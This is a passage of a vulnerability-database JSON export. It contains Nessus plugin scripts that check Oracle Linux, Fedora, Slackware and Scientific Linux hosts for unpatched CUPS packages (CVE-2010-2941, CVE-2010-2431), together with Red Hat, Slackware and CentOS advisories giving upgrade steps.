(!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"cups-1.4.2-35.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-devel-1.4.2-35.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-libs-1.4.2-35.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-lpd-1.4.2-35.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-php-1.4.2-35.el6_0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-devel / cups-libs / cups-lpd / cups-php\");\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:11:21", "bulletinFamily": "scanner", "description": "This update fixes a cupsd memory corruption vulnerability\n(CVE-2010-2941).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2016-05-11T00:00:00", "published": "2010-11-23T00:00:00", "id": "FEDORA_2010-17627.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50685", "title": "Fedora 12 : cups-1.4.4-11.fc12 (2010-17627)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-17627.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50685);\n script_version(\"$Revision: 1.10 $\");\n script_cvs_date(\"$Date: 2016/05/11 13:24:18 $\");\n\n script_cve_id(\"CVE-2010-2941\");\n script_bugtraq_id(44530);\n script_xref(name:\"FEDORA\", value:\"2010-17627\");\n\n script_name(english:\"Fedora 12 : cups-1.4.4-11.fc12 (2010-17627)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a cupsd memory corruption vulnerability\n(CVE-2010-2941).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=624438\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051277.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a3efb292\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^12([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 12.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC12\", reference:\"cups-1.4.4-11.fc12\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups\");\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:11:21", "bulletinFamily": "scanner", "description": "This update fixes a cupsd memory corruption vulnerability\n(CVE-2010-2941), as well as fixing a crash when the MIME database\ncannot be loaded for any reason.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2016-05-11T00:00:00", "published": "2010-11-23T00:00:00", "id": "FEDORA_2010-17615.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50684", "title": "Fedora 13 : cups-1.4.4-11.fc13 (2010-17615)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-17615.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50684);\n script_version(\"$Revision: 1.10 $\");\n script_cvs_date(\"$Date: 2016/05/11 13:24:18 $\");\n\n script_cve_id(\"CVE-2010-2941\");\n script_bugtraq_id(44530);\n script_xref(name:\"FEDORA\", value:\"2010-17615\");\n\n script_name(english:\"Fedora 13 : cups-1.4.4-11.fc13 (2010-17615)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a cupsd memory corruption vulnerability\n(CVE-2010-2941), as well as fixing a crash when the MIME database\ncannot be loaded for any reason.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=624438\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051301.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b2de2e22\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:13\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^13([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 13.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC13\", reference:\"cups-1.4.4-11.fc13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups\");\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:11:22", "bulletinFamily": "scanner", "description": "New cups packages are available for Slackware 12.0, 12.1, 12.2, 13.0,\n13.1, and -current to fix security issues.", "modified": "2016-05-12T00:00:00", "published": "2010-11-30T00:00:00", "id": "SLACKWARE_SSA_2010-333-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50832", "title": "Slackware 12.0 / 12.1 / 12.2 / 13.0 / 13.1 / current : cups (SSA:2010-333-01)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2010-333-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50832);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2016/05/12 14:46:31 $\");\n\n script_cve_id(\"CVE-2010-2941\");\n script_bugtraq_id(44530);\n script_xref(name:\"SSA\", value:\"2010-333-01\");\n\n script_name(english:\"Slackware 12.0 / 12.1 / 12.2 / 13.0 / 13.1 / current : cups (SSA:2010-333-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New cups packages are available for Slackware 12.0, 12.1, 12.2, 13.0,\n13.1, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.468323\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fdeb2125\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"12.0\", pkgname:\"cups\", pkgver:\"1.3.11\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"cups\", pkgver:\"1.3.11\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"12.2\", pkgname:\"cups\", pkgver:\"1.3.11\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\n\nif (slackware_check(osver:\"13.0\", pkgname:\"cups\", pkgver:\"1.3.11\", pkgarch:\"i486\", pkgnum:\"2_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"cups\", pkgver:\"1.3.11\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"cups\", pkgver:\"1.4.5\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"cups\", pkgver:\"1.4.5\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"cups\", pkgver:\"1.4.5\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"cups\", pkgver:\"1.4.5\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:14:22", "bulletinFamily": "scanner", "description": "A use-after-free flaw was found in the way the CUPS server parsed\nInternet Printing Protocol (IPP) packets. A malicious user able to\nsend IPP requests to the CUPS server could use this flaw to crash the\nCUPS server or, potentially, execute arbitrary code with the\nprivileges of the CUPS server. (CVE-2010-2941)\n\nA possible privilege escalation flaw was found in CUPS. An\nunprivileged process running as the 'lp' user (such as a compromised\nexternal filter program spawned by the CUPS server) could trick the\nCUPS server into overwriting arbitrary files as the root user.\n(CVE-2010-2431)\n\nAfter installing this update, the cupsd daemon will be restarted\nautomatically.", "modified": "2019-01-02T00:00:00", "published": "2012-08-01T00:00:00", "id": "SL_20101028_CUPS_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60881", "title": "Scientific Linux Security Update : cups on SL5.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60881);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/01/02 10:36:43\");\n\n script_cve_id(\"CVE-2010-2431\", \"CVE-2010-2941\");\n\n script_name(english:\"Scientific Linux Security Update : cups on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A use-after-free flaw was found in the way the CUPS server parsed\nInternet Printing Protocol (IPP) packets. A malicious user able to\nsend IPP requests to the CUPS server could use this flaw to crash the\nCUPS server or, potentially, execute arbitrary code with the\nprivileges of the CUPS server. (CVE-2010-2941)\n\nA possible privilege escalation flaw was found in CUPS. An\nunprivileged process running as the 'lp' user (such as a compromised\nexternal filter program spawned by the CUPS server) could trick the\nCUPS server into overwriting arbitrary files as the root user.\n(CVE-2010-2431)\n\nAfter installing this update, the cupsd daemon will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1010&L=scientific-linux-errata&T=0&P=3729\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f6812e3b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"cups-1.3.7-18.el5_5.8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"cups-devel-1.3.7-18.el5_5.8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"cups-libs-1.3.7-18.el5_5.8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"cups-lpd-1.3.7-18.el5_5.8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T19:42:40", "bulletinFamily": "unix", "description": "The Common UNIX Printing System (CUPS) provides a portable printing layer\nfor UNIX operating systems.\n\nAn invalid free flaw was found in the way the CUPS server parsed Internet\nPrinting Protocol (IPP) packets. A malicious user able to send IPP requests\nto the CUPS server could use this flaw to crash the CUPS server.\n(CVE-2010-2941)\n\nRed Hat would like to thank Emmanuel Bouillon of NATO C3 Agency for\nreporting this issue.\n\nUsers of cups are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing this\nupdate, the cupsd daemon will be restarted automatically.\n", "modified": "2018-06-06T20:24:27", "published": "2010-11-10T05:00:00", "id": "RHSA-2010:0866", "href": "https://access.redhat.com/errata/RHSA-2010:0866", "type": "redhat", "title": "(RHSA-2010:0866) Important: cups security update", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:44:08", "bulletinFamily": "unix", "description": "The Common UNIX Printing System (CUPS) provides a portable printing layer\nfor UNIX operating systems.\n\nA use-after-free flaw was found in the way the CUPS server parsed Internet\nPrinting Protocol (IPP) packets. A malicious user able to send IPP requests\nto the CUPS server could use this flaw to crash the CUPS server or,\npotentially, execute arbitrary code with the privileges of the CUPS server.\n(CVE-2010-2941)\n\nA possible privilege escalation flaw was found in CUPS. An unprivileged\nprocess running as the \"lp\" user (such as a compromised external filter\nprogram spawned by the CUPS server) could trick the CUPS server into\noverwriting arbitrary files as the root user. (CVE-2010-2431)\n\nRed Hat would like to thank Emmanuel Bouillon of NATO C3 Agency for\nreporting the CVE-2010-2941 issue.\n\nUsers of cups are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the cupsd daemon will be restarted automatically.\n", "modified": "2017-09-08T12:09:19", "published": "2010-10-28T04:00:00", "id": "RHSA-2010:0811", "href": "https://access.redhat.com/errata/RHSA-2010:0811", "type": "redhat", "title": "(RHSA-2010:0811) Important: cups security update", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2018-08-31T02:36:47", "bulletinFamily": "unix", "description": "New cups packages are available for Slackware 12.0, 12.1, 12.2, 13.0, 13.1,\nand -current to fix security issues.\n\n\nHere are the details from the Slackware 13.1 ChangeLog:\n\npatches/packages/cups-1.4.5-i486-1_slack13.1.txz: Upgraded.\n Fixed memory corruption bugs that could lead to a denial of service\n or possibly execution of arbitrary code through a crafted IPP request.\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2941\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/cups-1.3.11-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/cups-1.3.11-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/cups-1.3.11-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/cups-1.3.11-i486-2_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/cups-1.3.11-x86_64-2_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/cups-1.4.5-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/cups-1.4.5-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/cups-1.4.5-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/cups-1.4.5-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\n762ee07dbb88595593636568ed240731 cups-1.3.11-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nab01404cc7c216659936e044b8240459 cups-1.3.11-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n8a3637d485937dec15ceff5ca382cbdd cups-1.3.11-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\nd2e9d18e77bf61bdcdfb4b1806374156 cups-1.3.11-i486-2_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n8c30afdf61bad44ff2da9c157d6d8f6b cups-1.3.11-x86_64-2_slack13.0.txz\n\nSlackware 13.1 package:\n9f57bd4262aa861fc19544b8af5bf561 cups-1.4.5-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\nbfc4a72cea8443f4c07922297e2f60b2 cups-1.4.5-x86_64-1_slack13.1.txz\n\nSlackware -current package:\nb95f1b2854334c4d0f9dae3f8a06a787 cups-1.4.5-i486-1.txz\n\nSlackware x86_64 -current package:\n8a54fb8a0bd9a6dcfc1d25abf2e4b0f9 cups-1.4.5-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg cups-1.4.5-i486-1_slack13.1.txz\n\nThen, restart the cups server:\n > sh /etc/rc.d/rc.cups restart", "modified": "2010-11-29T18:40:23", "published": "2010-11-29T18:40:23", "id": "SSA-2010-333-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.468323", "title": "cups", "type": "slackware", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-03T18:26:36", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2010:0811\n\n\nThe Common UNIX Printing System (CUPS) provides a portable printing layer\nfor UNIX operating systems.\n\nA use-after-free flaw was found in the way the CUPS server parsed Internet\nPrinting Protocol (IPP) packets. A malicious user able to send IPP requests\nto the CUPS server could use this flaw to crash the CUPS server or,\npotentially, execute arbitrary code with the privileges of the CUPS server.\n(CVE-2010-2941)\n\nA possible privilege escalation flaw was found in CUPS. An unprivileged\nprocess running as the \"lp\" user (such as a compromised external filter\nprogram spawned by the CUPS server) could trick the CUPS server into\noverwriting arbitrary files as the root user. (CVE-2010-2431)\n\nRed Hat would like to thank Emmanuel Bouillon of NATO C3 Agency for\nreporting the CVE-2010-2941 issue.\n\nUsers of cups are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the cupsd daemon will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-November/017135.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-November/017136.html\n\n**Affected packages:**\ncups\ncups-devel\ncups-libs\ncups-lpd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0811.html", "modified": "2010-11-01T17:30:05", "published": "2010-11-01T17:28:39", "href": "http://lists.centos.org/pipermail/centos-announce/2010-November/017135.html", "id": "CESA-2010:0811", "title": "cups security update", "type": "centos", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:45:57", "bulletinFamily": "unix", "description": "[1.3.7-18:.8]\r\n- Applied patch to fix cupsd memory 